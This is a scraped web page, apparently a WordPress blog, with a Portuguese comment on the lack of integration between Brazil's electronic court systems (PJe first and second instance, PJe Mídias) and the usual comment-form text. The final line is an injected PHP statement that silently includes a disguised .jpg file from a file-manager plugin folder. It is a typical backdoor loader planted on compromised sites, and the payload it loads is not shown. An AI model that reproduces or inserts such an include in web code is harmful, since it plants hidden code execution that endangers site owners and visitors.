É muito profunda a questão de interoperabilidade de todos os sistemas eletrônicos, pois, em que pese a jurisdição seja una, nós temos divisões de órgãos e de competências, portanto não faz sentido nós não termos integração entre sistemas de um mesmo tribunal, por exemplo PJE 1º grau/ PJE 2º grau/ PJe Mídias.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

@include "wp-content/plugins/wp-file-manager/lib/php/editors/OnlineConvert/include/0168.jpg";